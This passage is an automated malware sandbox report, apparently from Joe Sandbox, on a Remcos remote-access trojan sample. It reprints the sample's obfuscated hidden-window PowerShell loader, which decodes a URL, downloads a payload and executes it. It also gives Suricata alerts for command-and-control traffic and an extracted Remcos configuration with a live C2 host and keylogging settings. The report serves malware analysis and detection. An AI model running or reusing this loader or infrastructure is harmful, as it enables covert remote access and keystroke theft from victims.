Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,ri
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,ri

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 4348, TargetFilename: C:\ProgramData\remcos\logs.dat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-22T07:02:37.571910+020020365941Malware Command and Control Activity Detected192.168.2.449738192.169.69.2651525TCP
                2024-10-22T07:02:39.507074+020020365941Malware Command and Control Activity Detected192.168.2.449739192.169.69.2651525TCP
                2024-10-22T07:02:41.285525+020020365941Malware Command and Control Activity Detected192.168.2.449740192.169.69.2651525TCP
                2024-10-22T07:02:43.172847+020020365941Malware Command and Control Activity Detected192.168.2.449741192.169.69.2651525TCP
                2024-10-22T07:02:45.089964+020020365941Malware Command and Control Activity Detected192.168.2.449742192.169.69.2651525TCP
                2024-10-22T07:02:47.047752+020020365941Malware Command and Control Activity Detected192.168.2.449743192.169.69.2651525TCP
                2024-10-22T07:02:49.036841+020020365941Malware Command and Control Activity Detected192.168.2.449744192.169.69.2651525TCP
                2024-10-22T07:02:51.010939+020020365941Malware Command and Control Activity Detected192.168.2.449745192.169.69.2651525TCP
                2024-10-22T07:02:52.969305+020020365941Malware Command and Control Activity Detected192.168.2.449746192.169.69.2651525TCP
                2024-10-22T07:02:54.925553+020020365941Malware Command and Control Activity Detected192.168.2.449748192.169.69.2651525TCP
                2024-10-22T07:02:56.872230+020020365941Malware Command and Control Activity Detected192.168.2.449750192.169.69.2651525TCP
                2024-10-22T07:02:58.709844+020020365941Malware Command and Control Activity Detected192.168.2.449756192.169.69.2651525TCP
                2024-10-22T07:03:00.653149+020020365941Malware Command and Control Activity Detected192.168.2.449770192.169.69.2651525TCP
                2024-10-22T07:03:02.569323+020020365941Malware Command and Control Activity Detected192.168.2.449782192.169.69.2651525TCP
                2024-10-22T07:03:04.440351+020020365941Malware Command and Control Activity Detected192.168.2.449794192.169.69.2651525TCP
                2024-10-22T07:03:06.187956+020020365941Malware Command and Control Activity Detected192.168.2.449805192.169.69.2651525TCP
                2024-10-22T07:03:08.175447+020020365941Malware Command and Control Activity Detected192.168.2.449816192.169.69.2651525TCP
                2024-10-22T07:03:09.992011+020020365941Malware Command and Control Activity Detected192.168.2.449827192.169.69.2651525TCP
                2024-10-22T07:03:11.856270+020020365941Malware Command and Control Activity Detected192.168.2.449838192.169.69.2651525TCP
                2024-10-22T07:03:13.818305+020020365941Malware Command and Control Activity Detected192.168.2.449849192.169.69.2651525TCP
                2024-10-22T07:03:15.579565+020020365941Malware Command and Control Activity Detected192.168.2.449863192.169.69.2651525TCP
                2024-10-22T07:03:17.452247+020020365941Malware Command and Control Activity Detected192.168.2.449874192.169.69.2651525TCP
                2024-10-22T07:03:19.302793+020020365941Malware Command and Control Activity Detected192.168.2.449886192.169.69.2651525TCP
                2024-10-22T07:03:21.297647+020020365941Malware Command and Control Activity Detected192.168.2.449897192.169.69.2651525TCP
                2024-10-22T07:03:23.275716+020020365941Malware Command and Control Activity Detected192.168.2.449909192.169.69.2651525TCP
                2024-10-22T07:03:25.250701+020020365941Malware Command and Control Activity Detected192.168.2.449920192.169.69.2651525TCP
                2024-10-22T07:03:27.115148+020020365941Malware Command and Control Activity Detected192.168.2.449933192.169.69.2651525TCP
                2024-10-22T07:03:28.913614+020020365941Malware Command and Control Activity Detected192.168.2.449945192.169.69.2651525TCP
                2024-10-22T07:03:30.697458+020020365941Malware Command and Control Activity Detected192.168.2.449955192.169.69.2651525TCP
                2024-10-22T07:03:32.667178+020020365941Malware Command and Control Activity Detected192.168.2.449964192.169.69.2651525TCP
                2024-10-22T07:03:34.538421+020020365941Malware Command and Control Activity Detected192.168.2.449975192.169.69.2651525TCP
                2024-10-22T07:03:36.331464+020020365941Malware Command and Control Activity Detected192.168.2.449986192.169.69.2651525TCP
                2024-10-22T07:03:38.310163+020020365941Malware Command and Control Activity Detected192.168.2.449997192.169.69.2651525TCP
                2024-10-22T07:03:40.217571+020020365941Malware Command and Control Activity Detected192.168.2.450008192.169.69.2651525TCP
                2024-10-22T07:03:42.067585+020020365941Malware Command and Control Activity Detected192.168.2.450020192.169.69.2651525TCP
                2024-10-22T07:03:43.802178+020020365941Malware Command and Control Activity Detected192.168.2.450030192.169.69.2651525TCP
                2024-10-22T07:03:45.625702+020020365941Malware Command and Control Activity Detected192.168.2.450040192.169.69.2651525TCP
                2024-10-22T07:03:47.261963+020020365941Malware Command and Control Activity Detected192.168.2.450041192.169.69.2651525TCP
                2024-10-22T07:03:49.006198+020020365941Malware Command and Control Activity Detected192.168.2.450042192.169.69.2651525TCP
                2024-10-22T07:03:50.658231+020020365941Malware Command and Control Activity Detected192.168.2.450043192.169.69.2651525TCP
                2024-10-22T07:03:52.391134+020020365941Malware Command and Control Activity Detected192.168.2.450044192.169.69.2651525TCP
                2024-10-22T07:03:54.007528+020020365941Malware Command and Control Activity Detected192.168.2.450045192.169.69.2651525TCP
                2024-10-22T07:03:55.611201+020020365941Malware Command and Control Activity Detected192.168.2.450046192.169.69.2651525TCP
                2024-10-22T07:03:57.205992+020020365941Malware Command and Control Activity Detected192.168.2.450047192.169.69.2651525TCP
                2024-10-22T07:03:58.783271+020020365941Malware Command and Control Activity Detected192.168.2.450048192.169.69.2651525TCP
                2024-10-22T07:04:00.296107+020020365941Malware Command and Control Activity Detected192.168.2.450049192.169.69.2651525TCP
                2024-10-22T07:04:01.930194+020020365941Malware Command and Control Activity Detected192.168.2.450050192.169.69.2651525TCP
                2024-10-22T07:04:03.335862+020020365941Malware Command and Control Activity Detected192.168.2.450051192.169.69.2651525TCP
                2024-10-22T07:04:04.793370+020020365941Malware Command and Control Activity Detected192.168.2.450052192.169.69.2651525TCP
                2024-10-22T07:04:06.280632+020020365941Malware Command and Control Activity Detected192.168.2.450053192.169.69.2651525TCP
                2024-10-22T07:04:07.737789+020020365941Malware Command and Control Activity Detected192.168.2.450054192.169.69.2651525TCP
                2024-10-22T07:04:09.037953+020020365941Malware Command and Control Activity Detected192.168.2.450055192.169.69.2651525TCP
                2024-10-22T07:04:10.317367+020020365941Malware Command and Control Activity Detected192.168.2.450056192.169.69.2651525TCP
                2024-10-22T07:04:11.708139+020020365941Malware Command and Control Activity Detected192.168.2.450057192.169.69.2651525TCP
                2024-10-22T07:04:13.173500+020020365941Malware Command and Control Activity Detected192.168.2.450058192.169.69.2651525TCP
                2024-10-22T07:04:14.675539+020020365941Malware Command and Control Activity Detected192.168.2.450059192.169.69.2651525TCP
                2024-10-22T07:04:16.081463+020020365941Malware Command and Control Activity Detected192.168.2.450060192.169.69.2651525TCP
                2024-10-22T07:04:17.290370+020020365941Malware Command and Control Activity Detected192.168.2.450061192.169.69.2651525TCP
                2024-10-22T07:04:18.712284+020020365941Malware Command and Control Activity Detected192.168.2.450062192.169.69.2651525TCP
                2024-10-22T07:04:19.963537+020020365941Malware Command and Control Activity Detected192.168.2.450063192.169.69.2651525TCP
                2024-10-22T07:04:21.219845+020020365941Malware Command and Control Activity Detected192.168.2.450064192.169.69.2651525TCP
                2024-10-22T07:04:22.559881+020020365941Malware Command and Control Activity Detected192.168.2.450065192.169.69.2651525TCP
                2024-10-22T07:04:23.807201+020020365941Malware Command and Control Activity Detected192.168.2.450066192.169.69.2651525TCP
                2024-10-22T07:04:25.063888+020020365941Malware Command and Control Activity Detected192.168.2.450067192.169.69.2651525TCP
                2024-10-22T07:04:26.252196+020020365941Malware Command and Control Activity Detected192.168.2.450068192.169.69.2651525TCP
                2024-10-22T07:04:27.448799+020020365941Malware Command and Control Activity Detected192.168.2.450069192.169.69.2651525TCP
                2024-10-22T07:04:28.893611+020020365941Malware Command and Control Activity Detected192.168.2.450070192.169.69.2651525TCP
                2024-10-22T07:04:30.059857+020020365941Malware Command and Control Activity Detected192.168.2.450071192.169.69.2651525TCP
                2024-10-22T07:04:31.375515+020020365941Malware Command and Control Activity Detected192.168.2.450072192.169.69.2651525TCP
                2024-10-22T07:04:32.580344+020020365941Malware Command and Control Activity Detected192.168.2.450073192.169.69.2651525TCP
                2024-10-22T07:04:33.881665+020020365941Malware Command and Control Activity Detected192.168.2.450074192.169.69.2651525TCP
                2024-10-22T07:04:35.055487+020020365941Malware Command and Control Activity Detected192.168.2.450075192.169.69.2651525TCP
                2024-10-22T07:04:36.309035+020020365941Malware Command and Control Activity Detected192.168.2.450076192.169.69.2651525TCP
                2024-10-22T07:04:37.466040+020020365941Malware Command and Control Activity Detected192.168.2.450077192.169.69.2651525TCP
                2024-10-22T07:04:38.672751+020020365941Malware Command and Control Activity Detected192.168.2.450078192.169.69.2651525TCP
                2024-10-22T07:04:39.777269+020020365941Malware Command and Control Activity Detected192.168.2.450079192.169.69.2651525TCP
                2024-10-22T07:04:40.872599+020020365941Malware Command and Control Activity Detected192.168.2.450080192.169.69.2651525TCP
                2024-10-22T07:04:41.887765+020020365941Malware Command and Control Activity Detected192.168.2.450081192.169.69.2651525TCP
                2024-10-22T07:04:42.996747+020020365941Malware Command and Control Activity Detected192.168.2.450082192.169.69.2651525TCP
                2024-10-22T07:04:44.131297+020020365941Malware Command and Control Activity Detected192.168.2.450083192.169.69.2651525TCP
                2024-10-22T07:04:45.153786+020020365941Malware Command and Control Activity Detected192.168.2.450084192.169.69.2651525TCP
                2024-10-22T07:04:46.233491+020020365941Malware Command and Control Activity Detected192.168.2.450085192.169.69.2651525TCP
                2024-10-22T07:04:47.287171+020020365941Malware Command and Control Activity Detected192.168.2.450086192.169.69.2651525TCP
                2024-10-22T07:04:48.361560+020020365941Malware Command and Control Activity Detected192.168.2.450087192.169.69.2651525TCP
                2024-10-22T07:04:49.475780+020020365941Malware Command and Control Activity Detected192.168.2.450088192.169.69.2651525TCP
                2024-10-22T07:04:50.627962+020020365941Malware Command and Control Activity Detected192.168.2.450089192.169.69.2651525TCP
                2024-10-22T07:04:51.640324+020020365941Malware Command and Control Activity Detected192.168.2.450090192.169.69.2651525TCP
                2024-10-22T07:04:52.767936+020020365941Malware Command and Control Activity Detected192.168.2.450091192.169.69.2651525TCP
                2024-10-22T07:04:53.773761+020020365941Malware Command and Control Activity Detected192.168.2.450092192.169.69.2651525TCP
                2024-10-22T07:04:54.950176+020020365941Malware Command and Control Activity Detected192.168.2.450093192.169.69.2651525TCP
                2024-10-22T07:04:56.005740+020020365941Malware Command and Control Activity Detected192.168.2.450094192.169.69.2651525TCP
                2024-10-22T07:04:57.105722+020020365941Malware Command and Control Activity Detected192.168.2.450095192.169.69.2651525TCP
                2024-10-22T07:04:58.116867+020020365941Malware Command and Control Activity Detected192.168.2.450096192.169.69.2651525TCP
                2024-10-22T07:04:59.157514+020020365941Malware Command and Control Activity Detected192.168.2.450097192.169.69.2651525TCP
                2024-10-22T07:05:00.249522+020020365941Malware Command and Control Activity Detected192.168.2.450098192.169.69.2651525TCP
                2024-10-22T07:05:01.259081+020020365941Malware Command and Control Activity Detected192.168.2.450099192.169.69.2651525TCP
                2024-10-22T07:05:02.364528+020020365941Malware Command and Control Activity Detected192.168.2.450100192.169.69.2651525TCP
                2024-10-22T07:05:03.279072+020020365941Malware Command and Control Activity Detected192.168.2.450101192.169.69.2651525TCP
                2024-10-22T07:05:04.338872+020020365941Malware Command and Control Activity Detected192.168.2.450102192.169.69.2651525TCP
                2024-10-22T07:05:05.335695+020020365941Malware Command and Control Activity Detected192.168.2.450103192.169.69.2651525TCP
                2024-10-22T07:05:06.287667+020020365941Malware Command and Control Activity Detected192.168.2.450104192.169.69.2651525TCP
                2024-10-22T07:05:07.281551+020020365941Malware Command and Control Activity Detected192.168.2.450105192.169.69.2651525TCP
                2024-10-22T07:05:09.157051+020020365941Malware Command and Control Activity Detected192.168.2.450106192.169.69.2651525TCP
                2024-10-22T07:05:10.578973+020020365941Malware Command and Control Activity Detected192.168.2.450107192.169.69.2651525TCP
                2024-10-22T07:05:11.497955+020020365941Malware Command and Control Activity Detected192.168.2.450108192.169.69.2651525TCP
                2024-10-22T07:05:12.430804+020020365941Malware Command and Control Activity Detected192.168.2.450109192.169.69.2651525TCP
                2024-10-22T07:05:13.457840+020020365941Malware Command and Control Activity Detected192.168.2.450110192.169.69.2651525TCP
                2024-10-22T07:05:14.711917+020020365941Malware Command and Control Activity Detected192.168.2.450111192.169.69.2651525TCP
                2024-10-22T07:05:15.625918+020020365941Malware Command and Control Activity Detected192.168.2.450112192.169.69.2651525TCP
                2024-10-22T07:05:16.639438+020020365941Malware Command and Control Activity Detected192.168.2.450113192.169.69.2651525TCP
                2024-10-22T07:05:17.565876+020020365941Malware Command and Control Activity Detected192.168.2.450114192.169.69.2651525TCP
                2024-10-22T07:05:18.687875+020020365941Malware Command and Control Activity Detected192.168.2.450115192.169.69.2651525TCP
                2024-10-22T07:05:19.786538+020020365941Malware Command and Control Activity Detected192.168.2.450116192.169.69.2651525TCP
                2024-10-22T07:05:20.862632+020020365941Malware Command and Control Activity Detected192.168.2.450117192.169.69.2651525TCP
                2024-10-22T07:05:22.489982+020020365941Malware Command and Control Activity Detected192.168.2.450118192.169.69.2651525TCP
                2024-10-22T07:05:23.454861+020020365941Malware Command and Control Activity Detected192.168.2.450119192.169.69.2651525TCP
                2024-10-22T07:05:24.414417+020020365941Malware Command and Control Activity Detected192.168.2.450120192.169.69.2651525TCP
                2024-10-22T07:05:26.433164+020020365941Malware Command and Control Activity Detected192.168.2.450121192.169.69.2651525TCP
                2024-10-22T07:05:27.345409+020020365941Malware Command and Control Activity Detected192.168.2.450122192.169.69.2651525TCP
                2024-10-22T07:05:28.286284+020020365941Malware Command and Control Activity Detected192.168.2.450123192.169.69.2651525TCP
                2024-10-22T07:05:29.199202+020020365941Malware Command and Control Activity Detected192.168.2.450124192.169.69.2651525TCP
                2024-10-22T07:05:30.116320+020020365941Malware Command and Control Activity Detected192.168.2.450125192.169.69.2651525TCP
                2024-10-22T07:05:31.082037+020020365941Malware Command and Control Activity Detected192.168.2.450126192.169.69.2651525TCP
                2024-10-22T07:05:31.848970+020020365941Malware Command and Control Activity Detected192.168.2.450127192.169.69.2651525TCP
                2024-10-22T07:05:32.748773+020020365941Malware Command and Control Activity Detected192.168.2.450128192.169.69.2651525TCP
                2024-10-22T07:05:33.618757+020020365941Malware Command and Control Activity Detected192.168.2.450129192.169.69.2651525TCP
                2024-10-22T07:05:34.531877+020020365941Malware Command and Control Activity Detected192.168.2.450130192.169.69.2651525TCP
                2024-10-22T07:05:35.528011+020020365941Malware Command and Control Activity Detected192.168.2.450131192.169.69.2651525TCP
                2024-10-22T07:05:36.317619+020020365941Malware Command and Control Activity Detected192.168.2.450132192.169.69.2651525TCP
                2024-10-22T07:05:37.214038+020020365941Malware Command and Control Activity Detected192.168.2.450133192.169.69.2651525TCP
                2024-10-22T07:05:38.144075+020020365941Malware Command and Control Activity Detected192.168.2.450134192.169.69.2651525TCP
                2024-10-22T07:05:39.041157+020020365941Malware Command and Control Activity Detected192.168.2.450135192.169.69.2651525TCP
                2024-10-22T07:05:39.941615+020020365941Malware Command and Control Activity Detected192.168.2.450136192.169.69.2651525TCP
                2024-10-22T07:05:40.979830+020020365941Malware Command and Control Activity Detected192.168.2.450137192.169.69.2651525TCP
                2024-10-22T07:05:41.886020+020020365941Malware Command and Control Activity Detected192.168.2.450138192.169.69.2651525TCP
                2024-10-22T07:05:42.927872+020020365941Malware Command and Control Activity Detected192.168.2.450139192.169.69.2651525TCP
                2024-10-22T07:05:43.809039+020020365941Malware Command and Control Activity Detected192.168.2.450140192.169.69.2651525TCP
                2024-10-22T07:05:44.669230+020020365941Malware Command and Control Activity Detected192.168.2.450141192.169.69.2651525TCP
                2024-10-22T07:05:45.641731+020020365941Malware Command and Control Activity Detected192.168.2.450142192.169.69.2651525TCP
                2024-10-22T07:05:46.550725+020020365941Malware Command and Control Activity Detected192.168.2.450143192.169.69.2651525TCP
                2024-10-22T07:05:47.557768+020020365941Malware Command and Control Activity Detected192.168.2.450144192.169.69.2651525TCP
                2024-10-22T07:05:48.479696+020020365941Malware Command and Control Activity Detected192.168.2.450145192.169.69.2651525TCP
                2024-10-22T07:05:49.441704+020020365941Malware Command and Control Activity Detected192.168.2.450146192.169.69.2651525TCP
                2024-10-22T07:05:50.326509+020020365941Malware Command and Control Activity Detected192.168.2.450147192.169.69.2651525TCP
                2024-10-22T07:05:51.321775+020020365941Malware Command and Control Activity Detected192.168.2.450148192.169.69.2651525TCP
                2024-10-22T07:05:52.378557+020020365941Malware Command and Control Activity Detected192.168.2.450149192.169.69.2651525TCP
                2024-10-22T07:05:53.130617+020020365941Malware Command and Control Activity Detected192.168.2.450150192.169.69.2651525TCP
                2024-10-22T07:05:54.114166+020020365941Malware Command and Control Activity Detected192.168.2.450151192.169.69.2651525TCP
                2024-10-22T07:05:54.869747+020020365941Malware Command and Control Activity Detected192.168.2.450152192.169.69.2651525TCP
                2024-10-22T07:05:55.842340+020020365941Malware Command and Control Activity Detected192.168.2.450153192.169.69.2651525TCP
                2024-10-22T07:05:56.610318+020020365941Malware Command and Control Activity Detected192.168.2.450154192.169.69.2651525TCP
                2024-10-22T07:05:57.467967+020020365941Malware Command and Control Activity Detected192.168.2.450155192.169.69.2651525TCP
                2024-10-22T07:05:58.314060+020020365941Malware Command and Control Activity Detected192.168.2.450156192.169.69.2651525TCP
                2024-10-22T07:05:59.827990+020020365941Malware Command and Control Activity Detected192.168.2.450157192.169.69.2651525TCP
                2024-10-22T07:06:00.769366+020020365941Malware Command and Control Activity Detected192.168.2.450158192.169.69.2651525TCP
                2024-10-22T07:06:01.749213+020020365941Malware Command and Control Activity Detected192.168.2.450159192.169.69.2651525TCP
                2024-10-22T07:06:02.672930+020020365941Malware Command and Control Activity Detected192.168.2.450160192.169.69.2651525TCP
                2024-10-22T07:06:03.673762+020020365941Malware Command and Control Activity Detected192.168.2.450161192.169.69.2651525TCP
                2024-10-22T07:06:07.602450+020020365941Malware Command and Control Activity Detected192.168.2.450162192.169.69.2651525TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-22T07:02:33.572403+020028032702Potentially Bad Traffic192.168.2.449737104.21.56.189443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000009.00000002.4145943989.0000000008951000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["pelele.duckdns.org:51525:1"], "Assigned name": "MISS Chy", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TXCR8B", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000003.3171953625.0000000008920000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.3171891296.000000000891A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4145943989.0000000008951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4145675736.000000000891A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.3171744633.000000000894D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4348, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1975994539.0000000007F8A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.1969850842.0000000006EF9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.1969850842.0000000006EF9000.00000004.00000020.00020000.00000000.sdmp

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49740 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49743 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49746 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49748 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49745 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49744 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49756 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49750 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49770 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49782 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49794 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49816 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49805 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49827 -> 192.169.69.26:51525
